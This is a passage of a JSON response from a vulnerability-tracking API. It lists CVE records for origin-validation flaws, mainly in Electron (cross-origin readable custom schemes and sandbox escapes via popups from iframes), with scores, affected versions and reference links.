through-1.0.31-cors-origin-bypass","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":0.00235,"epssPercentile":0.13246,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-29T20:17:18.620Z","addedAt":"2026-09-29T21:50:42.614Z","updatedAt":"2026-09-30T17:50:46.369Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-102878","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-102878","note":"authoritative record"}]},{"id":"386e9265-7ae3-42d0-9253-8b4230bf3a47","slug":"cve-2026-102675","externalId":"CVE-2026-102675","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-102675 — Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS.","description":"Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 41.10.6, 42.9.2, 43.4.1, and 44.0.0-beta.5, responses served through protocol.registerFileProtocol or protocol.registerHttpProtocol for a custom scheme registered with supportFetchAPI enabled but corsEnabled disabled could remain script-readable across origins. This residual issue completes the remediation for CVE-2026-70604. Applications are affected only when they expose such a scheme and load untrusted content in the same session. Schemes intentionally registered with corsEnabled enabled remain cross-origin readable by design. This issue is fixed in versions 41.10.6, 42.9.2, 43.4.1, and 44.0.0-beta.5.","cveId":"CVE-2026-102675","cvssScore":7.4,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N","severity":"high","vendor":"npm","product":"electron","affectedVersions":["pkg:npm/electron < 41.10.6","pkg:npm/electron >= 42.0.0-alpha.1, < 42.9.2","pkg:npm/electron >= 43.0.0-alpha.1, < 43.4.1","pkg:npm/electron >= 44.0.0-alpha.1, < 44.0.0-beta.5"],"cwes":["CWE-346"],"tags":["nvd","status:received","osv","osv:ghsa-j84w-jfhq-vhvj","ecosystem:npm","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/electron/electron/commit/4d2784cc8592471ee2276235b8c2a03efddf937d","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/commit/80178e4631cb2f6a5e42f8e793b2ae9624e78a0d","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/commit/c595b05976e7a885465b043d17e00a92fc3c3397","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/commit/ef75c4b98caaa3ebc615f1eba302027028ee04d2","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v41.10.6","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v42.9.2","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v43.4.1","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v44.0.0-beta.5","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/security/advisories/GHSA-j84w-jfhq-vhvj","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-j84w-jfhq-vhvj","type":"advisory","title":"OSV GHSA-j84w-jfhq-vhvj"},{"url":"https://github.com/electron/electron","type":"vendor","title":"OSV package"}],"epssScore":0.00214,"epssPercentile":0.10754,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-29T17:17:07.813Z","addedAt":"2026-09-29T17:50:40.764Z","updatedAt":"2026-09-30T19:50:42.884Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-102675","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-102675","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-J84W-JFHQ-VHVJ"}]},{"id":"00f83096-30c6-4f11-93a0-169d12b4b390","slug":"cve-2026-102673","externalId":"CVE-2026-102673","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-102673 — Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS.","description":"Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 41.10.4, 42.5.2, and 43.0.0, popups opened from a sandboxed iframe through Electron's OpenURLFromTab navigation path, including links using target=\"_blank\" or a middle-click, did not receive the inherited HTML sandbox restrictions. An untrusted iframe using the allow-scripts allow-popups configuration could therefore open a popup with the embedding application's full origin, exposing that origin's cookies, storage, and same-origin scripting capabilities. Applications that do not embed untrusted content in sandboxed iframes are not affected. This issue is fixed in versions 41.10.4, 42.5.2, and 43.0.0.","cveId":"CVE-2026-102673","cvssScore":8.2,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","severity":"high","vendor":"npm","product":"electron","affectedVersions":["pkg:npm/electron < 41.10.4","pkg:npm/electron >= 42.0.0-alpha.1, < 42.5.2","pkg:npm/electron >= 43.0.0-alpha.1, < 43.0.0"],"cwes":["CWE-346","CWE-693"],"tags":["nvd","status:received","osv","osv:ghsa-hq2x-r82h-9wj4","ecosystem:npm","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/electron/electron/commit/7ea14d5f55ecb11a30447701ddca16b3feee0bba","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/commit/e26b2640e7795c42bfb111b76009cbb4327c9a69","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/commit/ebe1165ee2b05c203c26dd2244ef1c5b9b1c04da","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/pull/52133","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v41.10.4","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v42.5.2","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/releases/tag/v43.0.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/electron/electron/security/advisories/GHSA-hq2x-r82h-9wj4","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-hq2x-r82h-9wj4","type":"advisory","title":"OSV GHSA-hq2x-r82h-9wj4"},{"url":"https://github.com/electron/electron","type":"vendor","title":"OSV package"}],"epssScore":0.00147,"epssPercentile":0.03424,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-29T17:17:07.487Z","addedAt":"2026-09-29T17:50:40.753Z","updatedAt":"2026-09-30T21:50:43.335Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-102673","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-102673","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-HQ2X-R82H-9WJ4"}]}],"pagination":{"page":1,"limit":20,"total":325,"totalPages":17,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:17:23.973Z","durationMs":31,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-346"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}